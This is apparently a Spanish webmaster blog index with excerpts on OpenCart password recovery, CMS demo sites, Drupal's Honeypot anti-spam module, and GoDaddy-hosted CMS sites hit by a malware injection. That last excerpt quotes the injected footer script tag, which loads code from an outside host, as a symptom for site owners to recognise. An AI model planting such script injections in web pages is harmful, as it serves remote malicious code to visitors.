Recuperar contraseña (password) perdido en OpenCart

Si no tenemos el password de nuestra instalación de Opencart, podemos acceder a nuestro panel de administración de la base de datos, habitualmente PHPAdmin, seleccionamos la base de datos si tenemos varías, y buscamos la tabla que se llama user. La tabla puede llevar un prefijo, que es el que pusiste en la instalación de tu tienda. Buscas el usuario […]

Leer más

¿Como puedo probar mi CMS (Pagina de Gestor de Contenidos) antes de instalarla?

Bueno amigos siempre antes de instalar algun sitio con un Gestor de contenidos es bueno probar varias opciones pero para ello tenemos que instalarlo en nuestra pc con phpmyadmin o bien easyphp lo que puede hacer que perdamos tiempo al hacer las pruebas, buescando en internet encontre una pagina que contiene un portal Demo de cada Gestor de contenido, para que puedas probar antes de instalar, el portal tiene otra informacion y recursos para webmaster aunque solo en idioma ingles, espero les sea de mucha ayuda si eres webmaster o principiante.

http://www.opensourcecms.com/index.php

 

Algunos CMS son Drupal, WordPress, Joomla, Mambo, PHP Nuke, Etc..

Leer más

Reducir y/o eliminar Spam en Drupal

El spam nos afecta cada día y no solo en el email, sino también en los portales web en los que hay formularios públicos, como los de contacto o los de registro de usuarios.

En el caso de Drupal, un problema clásico se produce en aquellos portales que deben permitir el registro de usuarios. Esto implica que el formulario de registro sea público y, como es una URL conocida, los robots automáticos suelen atacarla creando cientos o miles de usuarios fraudulentos.

Puedes evitar que esos usuarios acaben siendo usarios reales del portal, pero acaban llenando tu sistema de usuarios zombie que nunca llegan a iniciar sesión. 

Hay múltiples métodos para luchar contra este problema, pero hoy os queremos hablar del módulo Honeypot. Se trata de un modo original de engañar a los robots automáticos de manera que se les detecta y se ignora su petición. 

El truco consiste, como indica el nombre del módulo, en atraer a los robots a una trampa (o tarro de miel). Para ello el módulo añade a cada formulario seleccionado un campo oculto que los usuarios humanos no verán, pero sí los robots. De este modo los robots, amigos de completar todos los campos, lo rellenarán y así sabremos que se trata de un robot (porque un humano no podría ver ese campo).

Además el módulo implementa un mecanismo de medición del tiempo que se tarda en rellenar el formulario. Así, por ejemplo, si el usuario completa el formulario en menos de 5 segundos podemos inferir que se trata de un robot e ignoraremos su petición.

En resumen un módulo sencillo pero efectivo que nos ha ayudado ya en varios portales (en conjunción con otras medidas como re-captcha, mollom ….).

Leer más

GoDaddy – WordPress, Drupal y Joomla – Sitios hackeados – Solucion

La semana pasada, en una serie de ataques (lo que había sucedido también en abril) centenares de sitios hackeados de godaddy tiene y se inyecta un gusano / virus / malware.  Los pies de página de todos estos sitios están mostrando esta línea

<script=http://kdjkfjskdfjlskdjf.com/kp.php> </ script>

(El virus es llamado asi: HTML/ScrInject.B.Gen virus)

Si tiene cualquier software antivirus instalado obtendrá un pop-up de advertencia como esta:

La eliminación de este malware no es fácil ya que afecta a todos los archivos php, y desde que esto sucedió en todo tipo de sitios como Wordpress, Drupal, Joomla y archivos php, es difícil dar instrucciones sencillas para quitar el virus malware de tu archivos.

He visto personas que pasaron horas de quitar manualmente el código de todos los archivos PHP sólo para ver después que llegaron de nuevo afectados. Además de actualizar el sitio de wordpress, drupal o Joomla a la última versión  no se detiene el virus.

Leer más